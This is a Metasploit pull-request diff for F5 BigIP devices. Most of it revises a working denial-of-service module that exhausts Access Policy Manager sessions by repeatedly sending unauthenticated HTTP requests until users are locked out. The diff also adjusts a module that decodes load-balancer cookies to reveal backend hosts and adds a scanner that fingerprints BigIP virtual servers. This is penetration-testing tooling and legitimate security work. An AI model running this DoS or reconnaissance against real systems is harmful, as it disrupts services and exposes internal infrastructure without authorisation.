Merge pull request #1 from jvazquez-r7/pr_4940

Clean "Updates and new modules for F5 devices"

Author: dnkolegov

modules/auxiliary/dos/http/f5_bigip_apm_max_sessions.rb

@@ -11,14 +11,17 @@ class Metasploit3 < Msf::Auxiliary
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'F5 BigIP APM Unauthenticated Session Exhaustion Denial of Service',
+      'Name'           => 'F5 BigIP Access Policy Manager Session Exhaustion Denial of Service',
       'Description'    => %q{
-        An unauthenticated attacker can establish multiple connections with BigIP Access Policy Manager
-        and exhaust all available sessions defined in customer\'s license.
-        In the first step of BigIP APM protocol the client sends a HTTP request.
-        The BigIP system creates a session, marks it as progress (pending) and then redirects client to access policy URI.
-        Since BigIP allocates a new session after the first unauthenticated request and deletes the session only if an access policy timeout will be expired
-        the attacker can exhaust all available sessions repeatedly sending initial HTTP request.
+        This module exploits a resource exhaustion denial of service in F5 BigIP devices. An
+        unauthenticated attacker can establish multiple connections with BigIP Access Policy
+        Manager (APM) and exhaust all available sessions defined in customer license. In the
+        first step of the BigIP APM negotiation the client sends a HTTP request. The BigIP
+        system creates a session, marks it as pending and then redirects the client to an access
+        policy URI. Since BigIP allocates a new session after the first unauthenticated request,
+        and deletes the session only if an access policy timeout expires, the attacker can exhaust
+        all available sessions by repeatedly sending the initial HTTP request and leaving the
+        sessions as pending.
       },
       'Author'         =>
         [
@@ -33,67 +36,63 @@ def initialize(info = {})
       'License'        => MSF_LICENSE,
       'DefaultOptions' =>
         {
-          'SSLVersion' => 'TLS1'
+          'SSL' => true,
+          'SSLVersion' => 'TLS1',
+          'RPORT' => 443
         }
     ))
 
     register_options(
       [
-        OptPort.new('RPORT', [true, 'The BigIP service port to listen on', 443]),
-        OptBool.new('SSL', [true, "Negotiate SSL for outgoing connections", true]),
         OptInt.new('RLIMIT', [true, 'The number of requests to send', 10000]),
-        OptBool.new('IGNOREMISMATCH', [true, 'Proceed with attack only if BigIP virtual server was detected', false]),
+        OptBool.new('FORCE', [true, 'Proceed with attack even if a BigIP virtual isn\'t detected', false])
       ], self.class)
   end
 
   def run
-    # Main function
-    rlimit = datastore['RLIMIT']
-    proto = datastore['SSL'] ? 'https' : 'http'
-    ignore_mismatch = datastore['IGNOREMISMATCH']
+    limit = datastore['RLIMIT']
+    force_attack = datastore['FORCE']
 
-    # Send an initial test request
     res = send_request_cgi('method' => 'GET', 'uri' => '/')
-    if res
-      server = res.headers['Server']
-      # Simple test based on HTTP Server header to detect BigIP virtual server
-      unless ignore_mismatch
-        if server !~ /BIG\-IP/ && server !~ /BigIP/
-          print_error("#{peer} - BigIP virtual server was not detected. Please check options")
-          return
-        end
-      end
-      print_good("#{peer} - Starting DoS attack")
-    else
-      print_error("#{peer} - Unable to connect to BigIP. Please check options")
+
+    unless res
+      print_error("#{peer} - No answer from the BigIP server")
+      return
+    end
+
+    # Simple test based on HTTP Server header to detect BigIP virtual server
+    server = res.headers['Server']
+    unless server =~ /BIG\-IP/ || server =~ /BigIP/ || force_attack
+      print_error("#{peer} - BigIP virtual server was not detected. Please check options")
       return
     end
 
+    print_status("#{peer} - Starting DoS attack")
+
     # Start attack
-    (1..rlimit).each do
+    limit.times do |step|
+      if step % 100 == 0
+        print_status("#{peer} - #{step * 100 / limit}% accomplished...")
+      end
       res = send_request_cgi('method' => 'GET', 'uri' => '/')
-      if res && res.headers['Location'] == '/my.logout.php3?errorcode=14'
-        print_good("#{peer} - The maximum number of concurrent user sessions has been reached. No new user sessions can start at this time")
-        print_good("#{peer} - DoS attack is successful")
+      if res && res.headers['Location'] =~ /\/my\.logout\.php3\?errorcode=14/
+        print_good("#{peer} - DoS accomplished: The maximum number of concurrent user sessions has been reached.")
         return
       end
     end
 
-    # Check if attack is unsuccessfull
+    # Check if attack has failed
     res = send_request_cgi('method' => 'GET', 'uri' => uri)
-    if res.headers['Location'] == '/my.policy'
-      print_status("#{peer} - DoS attack is unsuccessful. Try to increase the RLIMIT number")
+    if res.headers['Location'] =~ /\/my.policy/
+      print_error("#{peer} - DoS attack failed. Try to increase the RLIMIT")
     else
       print_status("#{peer} - Result is undefined. Try to manually determine DoS attack result")
     end
 
     rescue ::Rex::ConnectionRefused
-      print_error("#{peer} - Unable to connect to BigIP")
+      print_error("#{peer} - Unable to connect to BigIP. Maybe BigIP 'Max In Progress Sessions Per Client IP' counter was reached")
     rescue ::Rex::ConnectionTimeout
-      print_error("#{peer} - Unable to connect to BigIP. Please check options")
-    rescue ::Errno::ECONNRESET
-      print_error("#{peer} - The connection was reset. Probably BigIP \"Max In Progress Sessions Per Client IP\" counter was reached")
-      print_status("#{peer} - DoS attack is unsuccessful")
+      print_error("#{peer} - Unable to connect to BigIP.")
     rescue ::OpenSSL::SSL::SSLError
       print_error("#{peer} - SSL/TLS connection error")
   end

modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb

@@ -82,8 +82,8 @@ def cookie_decode(cookie_value)
       port = nil
     end
 
-    backend[:host] = (host.nil?) ? nil : host
-    backend[:port] = (port.nil?) ? nil : port
+    backend[:host] = host.nil? ? nil : host
+    backend[:port] = port.nil? ? nil : port
     backend
   end
 
@@ -146,8 +146,11 @@ def run
 
     # Reporting found backends in database
     unless backends.empty?
-      report_note(host: rhost, type: "f5_load_balancer_backends", data: backends)
+      report_note(host: rhost, type: 'f5_load_balancer_backends', data: backends)
     end
+
+    rescue ::Rex::ConnectionRefused
+      print_error("#{peer} - Network connection error")
     rescue ::Rex::ConnectionError
       print_error("#{peer} - Network connection error")
     rescue ::OpenSSL::SSL::SSLError

modules/auxiliary/scanner/http/f5_bigip_http_vs_scanner.rb

@@ -0,0 +1,91 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Scanner
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'F5 BigIP HTTP Virtual Server Scanner',
+      'Description' => %q{
+        This module scans for BigIP HTTP virtual servers using banner grabbing. BigIP system uses
+        different HTTP profiles for managing HTTP traffic and these profiles allow to customize
+        the string used as Server HTTP header. The default values are "BigIP" or "BIG-IP" depending
+        on the BigIP system version.
+      },
+      'Author'      =>
+        [
+          'Oleg Broslavsky <ovbroslavsky[at]gmail.com>',
+          'Nikita Oleksov <neoleksov[at]gmail.com>',
+          'Denis Kolegov <dnkolegov[at]gmail.com>',
+        ],
+      'License'     => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'URL', 'https://www.owasp.org/index.php/SCG_D_BIGIP'],
+        ]
+    ))
+
+    register_options(
+    [
+      OptString.new('PORTS', [true, 'Ports to scan (e.g. 80-81,443,8080-8090)', '80,443']),
+      OptInt.new('TIMEOUT', [true, 'The socket connect/read timeout in seconds', 1]),
+    ], self.class)
+
+    deregister_options('RPORT')
+  end
+
+  def bigip_http?(ip, port, ssl)
+    begin
+      res = send_request_raw(
+        {
+          'method' => 'GET',
+          'uri' => '/',
+          'rport' => port,
+          'ssl' => ssl,
+        },
+        datastore['TIMEOUT'])
+      return false unless res
+      server = res.headers['Server']
+      return true if server =~ /BIG\-IP/ || server =~ /BigIP/
+    rescue ::Rex::ConnectionRefused
+      vprint_error("#{ip}:#{port} - Connection refused")
+    rescue ::Rex::ConnectionError
+      vprint_error("#{ip}:#{port} - Connection error")
+    rescue ::OpenSSL::SSL::SSLError
+      vprint_error("#{ip}:#{port} - SSL/TLS connection error")
+    end
+
+    false
+  end
+
+  def run_host(ip)
+    ports = Rex::Socket.portspec_crack(datastore['PORTS'])
+
+    if ports.empty?
+      print_error('PORTS options is invalid')
+      return
+    end
+
+    ports.each do |port|
+
+      unless port == 443 # Skip http check for 443
+        if bigip_http?(ip, port, false)
+          print_good("#{ip}:#{port} - BigIP HTTP virtual server found")
+          next
+        end
+      end
+
+      unless port == 80 # Skip https check for 80
+        if bigip_http?(ip, port, true)
+          print_good("#{ip}:#{port} - BigIP HTTPS virtual server found")
+        end
+      end
+    end
+  end
+end